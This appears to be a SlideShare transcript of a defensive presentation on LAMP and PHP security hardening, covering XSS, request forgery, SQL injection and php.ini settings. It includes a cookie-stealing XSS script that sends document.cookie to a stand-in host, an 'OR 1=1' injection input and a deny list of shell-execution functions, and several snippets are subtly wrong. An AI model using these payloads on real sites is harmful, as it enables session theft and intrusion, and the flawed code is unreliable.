LAMP security practices
Upcoming SlideShare
Loading in...5
×
 

LAMP security practices

on

  • 3,393 views

 

Statistics

Views

Total Views
3,393
Views on SlideShare
3,023
Embed Views
370

Actions

Likes
2
Downloads
26
Comments
0

1 Embed 370

http://techstunts.com 370

Accessibility

Categories

Upload Details

Uploaded via as OpenOffice

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

LAMP security practices LAMP security practices Presentation Transcript

  • LAMP Security PracticesXSSRequest ForgeriesSQL InjectionDisable PHP, Apache, OS informationDisable unnecessary modulesLog PHP errorsDisable/Limit file uploadsDoS attackRemote Code executionDisable dangerous PHP functionsLimit access to file system
  • XSSA hacker posts the below given code snippet in the comment section of website http://exsite.com.Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + ">);</script>The code will load as it is whenever I will open the website http://exsite.com and will transfer my cookie data to hackers site (http://evilhacker.org):-Note that cookie data may have my login credentials which you as a hacker can use to
  • XSS solutionAll user submitted content should be filtered and all the disallowed characters should be removedIn particular <, >, and all html tags should be stripped
  • Request ForgeriesCreate, Update and Delete requests should be ensured to have originally generated from your applicationEx. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:-$_SESSION[signature] = md5(unique(rand(), true) + $username);$_SESSION[signature_timestamp] = time()echo “<a href=http://mysite.com/photos/delete/photo_id?signature ={$_SESSION[signature]}>”
  • Request ForgeriesCreate, Update and Delete requests should be ensured to have originally generated from your applicationEx. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:-$_SESSION[signature] = md5(unique(rand(), true) + $username);$_SESSION[signature_timestamp] = time()echo “<a href=http://mysite.com/photos/delete/photo_id?signature ={$_SESSION[signature]}>”
  • SQL InjectionEx. Input OR 1=1 in userid field of login form. If server script for authentication uses “ Select * FROM tblusers WHERE userid = $_GET[userid] ”, this code will be interpolated to “ Select * FROM tblusers WHERE userid = OR 1=1 ” which will result in valid records getting returned from database.
  • SQL Injection SolutionUse mysqli_real_escape_string($_GET[userid]) for all user supplied dataUse prepared statements:-$statement = $connection->prepare( "SELECT * FROM tblusers WHERE userid = ?" );$statement->bind_param( "i", $_GET[userid] );$statement->execute();
  • Disable PHP informationRun the command :curl -I http://mysite.com/HTTP/1.1 200 OKDate: Sat, 28 eApr 2012 09:48:55 GMTServer: Apache/2.2.20 (Ubuntu)X-Powered-By: PHP/5.3.6-13ubuntu3.6The output shows that the sites runs on PHP and the version of PHP as wellDisable the information by setting expose_php=off in php.ini
  • Disable Server InformationRun the command :curl -I http://mysite.com/HTTP/1.1 200 OKDate: Sat, 28 eApr 2012 09:48:55 GMTServer: Apache/2.2.20 (Ubuntu)The output shows Apache server, its version, and OS Ubuntu informationDisable these information by settingServerSignature OffServerTokens Prodin /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
  • Disable unnecessary modulesUse php -m to check list of enabled modulesDisable modules like gd if not requiredOn Ubuntu, goto folder /etc/php5/conf.dRun: sudo mv gd.{ini,disable} This will rename file gd.ini to gd.disable and then the gd module will not be loaded with php
  • Log PHP errorsUse following to hide PHP error messages to be diaplayed to site usersdisplay_errors = OffUse following to log the PHP error messages into a log filelog_errors = Onerror_log = /var/log/httpd/php-error.logFor realtime monitoring of php error log use:-tail -f /var/log/httpd/php-error.log
  • Disable File UploadsIf your site doesnt want file upload functionality, remove it from php.ini :-file_uploads = OffIf your site wants file upload functionality, set it to only the required minimum value :-file_upload = Onupload_max_size = 1M
  • DoS attackTo avoid script taking an infinite time and bringing down the server, use following settings:-max_execution_time = 30max_input_time = 30memory_limit = 40M
  • Remote Code ExecutionRemote urls can be opened by PHP functions like fopen, file_get_contents, include, requireThese remote urls are many time causes of code injection and data leakage when not filtered by programmers carefully.To restrict remote file opening:-allow_url_fopen = Offallow_url_include = Off
  • Disable Dangerous PHP functionsUse following directive to disable the php functions that are very powerful, dangerous and not normally required when PHP is running with a web server :-disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
  • Limit Access to File SystemUse following to restrict PHPs access to parts of file system:-open_basedir="/var/www/html/"The above will not allow PHP access to parts of file system like /etc or /tmp etc.
  • Session file pathSession files must be saved away from the web site folder. Use following to change session files location:-session.save_path="/var/lib/php/session"upload_tmp_dir="/var/lib/php/upload"
  • Write protect conf and application filesUse chattr +i command to write protect any filechattr +i /etc/php5/php.inichattr +i /etc/mysql/my.cnfchattr +i /etc/apache2/apache2.confchattr +i /var/www/html/Such files then can not be modified even by root user.Use chattr -i command to revert back the write protection
  • Refrences http://php.net/manual/en/security.php http://developer.yahoo.com/security http://www.phpfreaks.com/tutorial/php-security http://phpsec.org/php-security-guide.pdfhttp://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html